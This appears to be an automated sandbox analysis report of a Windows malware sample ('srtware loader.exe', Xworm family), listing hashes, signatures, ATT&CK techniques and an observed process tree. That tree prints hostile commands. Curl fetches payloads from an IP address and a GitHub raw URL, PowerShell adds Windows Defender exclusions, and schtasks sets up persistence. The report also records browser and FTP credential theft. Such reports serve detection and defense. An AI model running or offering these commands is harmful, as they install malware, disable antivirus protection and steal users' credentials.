Analysis
-
max time kernel
47s -
max time network
49s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/11/2024, 19:40
Static task
static1
Behavioral task
behavioral1
Sample
srtware loader.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
srtware loader.exe
Resource
win10v2004-20241007-en
General
-
Target
srtware loader.exe
-
Size
1.1MB
-
MD5
12395d08dc0bfe12e63605328ddd982f
-
SHA1
51ceb544e3900fb85fe7aada564d081219464d1d
-
SHA256
789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6
-
SHA512
1a26d4de93abf8f5af0b7e6ac3307f6cc6c3ce5b905545788430460c1664efa5637c856db3e994163147e259385da3125d6ff13a39bbade962c95872ea5bd4e4
-
SSDEEP
24576:vTc28b2Yf2eSf1xZ9a9wwz+NzYbiaCoWTXKjvFQxf:bcbb2UCrZ9wwwKJL2jvFQx
Malware Config
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/3208-75-0x0000000000AF0000-0x0000000000EA2000-memory.dmp family_xworm behavioral2/memory/3208-74-0x0000000000AF0000-0x0000000000EA2000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1512 powershell.exe 4028 powershell.exe 388 powershell.exe 1500 powershell.exe 3076 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 6 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/1464-2-0x00000000002C0000-0x0000000000652000-memory.dmp net_reactor behavioral2/memory/1188-63-0x0000000000100000-0x00000000004CE000-memory.dmp net_reactor behavioral2/memory/1188-69-0x0000000000100000-0x00000000004CE000-memory.dmp net_reactor behavioral2/memory/3208-75-0x0000000000AF0000-0x0000000000EA2000-memory.dmp net_reactor behavioral2/memory/3208-74-0x0000000000AF0000-0x0000000000EA2000-memory.dmp net_reactor behavioral2/memory/3208-170-0x0000000000AF0000-0x0000000000EA2000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation qqq.scr -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk qqq.scr File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk qqq.scr -
Executes dropped EXE 2 IoCs
pid Process 1188 fff.scr 3208 qqq.scr -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winnotify = "C:\\Users\\Public\\winnotify.scr" qqq.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 31 raw.githubusercontent.com 30 raw.githubusercontent.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 1464 srtware loader.exe 1464 srtware loader.exe 1464 srtware loader.exe 1188 fff.scr 1188 fff.scr 3208 qqq.scr 1464 srtware loader.exe 3208 qqq.scr 1464 srtware loader.exe 3208 qqq.scr 1464 srtware loader.exe 3208 qqq.scr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language srtware loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fff.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qqq.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2972 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1500 powershell.exe 1500 powershell.exe 1188 fff.scr 3076 powershell.exe 3076 powershell.exe 1512 powershell.exe 1512 powershell.exe 4028 powershell.exe 4028 powershell.exe 388 powershell.exe 388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1188 fff.scr Token: SeDebugPrivilege 3208 qqq.scr Token: SeDebugPrivilege 3076 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 388 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1464 srtware loader.exe 1188 fff.scr 3208 qqq.scr -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1464 wrote to memory of 1500 1464 srtware loader.exe 90 PID 1464 wrote to memory of 1500 1464 srtware loader.exe 90 PID 1464 wrote to memory of 1500 1464 srtware loader.exe 90 PID 1464 wrote to memory of 1752 1464 srtware loader.exe 93 PID 1464 wrote to memory of 1752 1464 srtware loader.exe 93 PID 1464 wrote to memory of 1752 1464 srtware loader.exe 93 PID 1464 wrote to memory of 1316 1464 srtware loader.exe 97 PID 1464 wrote to memory of 1316 1464 srtware loader.exe 97 PID 1464 wrote to memory of 1316 1464 srtware loader.exe 97 PID 1464 wrote to memory of 5048 1464 srtware loader.exe 99 PID 1464 wrote to memory of 5048 1464 srtware loader.exe 99 PID 1464 wrote to memory of 5048 1464 srtware loader.exe 99 PID 1464 wrote to memory of 4488 1464 srtware loader.exe 101 PID 1464 wrote to memory of 4488 1464 srtware loader.exe 101 PID 1464 wrote to memory of 4488 1464 srtware loader.exe 101 PID 1464 wrote to memory of 1392 1464 srtware loader.exe 103 PID 1464 wrote to memory of 1392 1464 srtware loader.exe 103 PID 1464 wrote to memory of 1392 1464 srtware loader.exe 103 PID 1464 wrote to memory of 1188 1464 srtware loader.exe 105 PID 1464 wrote to memory of 1188 1464 srtware loader.exe 105 PID 1464 wrote to memory of 1188 1464 srtware loader.exe 105 PID 1464 wrote to memory of 3208 1464 srtware loader.exe 106 PID 1464 wrote to memory of 3208 1464 srtware loader.exe 106 PID 1464 wrote to memory of 3208 1464 srtware loader.exe 106 PID 3208 wrote to memory of 3076 3208 qqq.scr 107 PID 3208 wrote to memory of 3076 3208 qqq.scr 107 PID 3208 wrote to memory of 3076 3208 qqq.scr 107 PID 3208 wrote to memory of 1512 3208 qqq.scr 110 PID 3208 wrote to memory of 1512 3208 qqq.scr 110 PID 3208 wrote to memory of 1512 3208 qqq.scr 110 PID 3208 wrote to memory of 4028 3208 qqq.scr 112 PID 3208 wrote to memory of 4028 3208 qqq.scr 112 PID 3208 wrote to memory of 4028 3208 qqq.scr 112 PID 3208 wrote to memory of 388 3208 qqq.scr 115 PID 3208 wrote to memory of 388 3208 qqq.scr 115 PID 3208 wrote to memory of 388 3208 qqq.scr 115 PID 3208 wrote to memory of 2972 3208 qqq.scr 117 PID 3208 wrote to memory of 2972 3208 qqq.scr 117 PID 3208 wrote to memory of 2972 3208 qqq.scr 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c mkdir C:\Users\gbcd2⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr2⤵PID:1316
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr2⤵PID:5048
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr2⤵PID:4488
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe2⤵
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Users\gbcd\fff.scr"C:\Users\gbcd\fff.scr"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1188
-
-
C:\Users\gbcd\qqq.scr"C:\Users\gbcd\qqq.scr"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2972
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5fc3f2e3336f15a67d2709d9c33d3a006
SHA1fa1e687b195e9a4f3a6f7f6f3a168e2511fe231d
SHA256b0f0ee241a8eaffc4da78d6a5eefb6e6701342a3f38b8571a9e62f9834120771
SHA5126777ea135b93e1fa0ce1e383cd1db2f6975001b0c064c4b961ad57fef9aa15f8e102191c0a43d1c68732946e49067e5ef2178b052d2da8318494708d028880a9
-
Filesize
18KB
MD53c8552a79d841b8439ad0dedb639c3e7
SHA1dc5e504e8551b076de4fb8a3bf22d9d1275db8fc
SHA2569bc36f696e489ddd7cd306a6d1022b82ef8507b3d659fecfe00662373aac4330
SHA512d64a5ba836f356de46aeed6d9c632cbc75fa41bf69f868698b45e73126e35425bb857cfea1ec732f2dbfc228b6d5e3374f5f4237578cc90d64b5b487dae6ea4f
-
Filesize
18KB
MD5f326f80af25fe21562da9d48924971e1
SHA119afe302b9c6b31f653afdb62a2219465d8c1d19
SHA256afdf942ee9c4cea2212b6fd43c7f72f49eef099c3713e6bd311fd705322957b4
SHA512bcb72b344fffe4c284232453dc6a9c5218d05f6002657407ca8389db7eb1da8a053fc2727553c00a943e6308bdc7a99a252614b394ca2e58f27b2506d02e9cbe
-
Filesize
18KB
MD5d14b8dcacb34ddfc5e30865ac66f8f18
SHA146fcd129b3a6b0f9bec1c39e902770f894f61d5b
SHA256a5fde4b66847333c13065c9a17ff801a73907a37a3f0f64d6b343139973b989c
SHA5123902b7e251ea36f76812c1aad31fb5cfd686e857a7b65a1a6b178322ce3c31cf47190c6f0a9a75e264eff1bcef828c3f57eac1f84c88a2f9fc2258919e46a013
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD52a26ee4cbff061962a08e1e1ff21b2a3
SHA15d46e38be7aa3804036aeeea866ea779248620c0
SHA256985b3985ac504754e2eb844272996a6a368e0bd732facdf096e522648d2db10a
SHA512ae6e6273f209b95a6895ad28f208e46857178c80283cbb2d8fcfe30f52c921f36736b718807623cba969960a7ecd5547b9b53750f33a4ed25e4bc40eb15aead2
-
Filesize
1.1MB
MD533300acb6fb3c7effae29a3eb133be2e
SHA15c906423479c8089be9c51ee2a015d6fb634a4b3
SHA256f7b3c2421385d8169d382b108ebb542786bab4a622a73b039dc887e25682c952
SHA51255a6e5253fe7b9df1c0788c34685d3f33289cd29bfa6a0cf99e0671dda0655dd885d0b93912e21eac5f16978cc02c33ff0849be8afffacdcae8f0a64a91049d3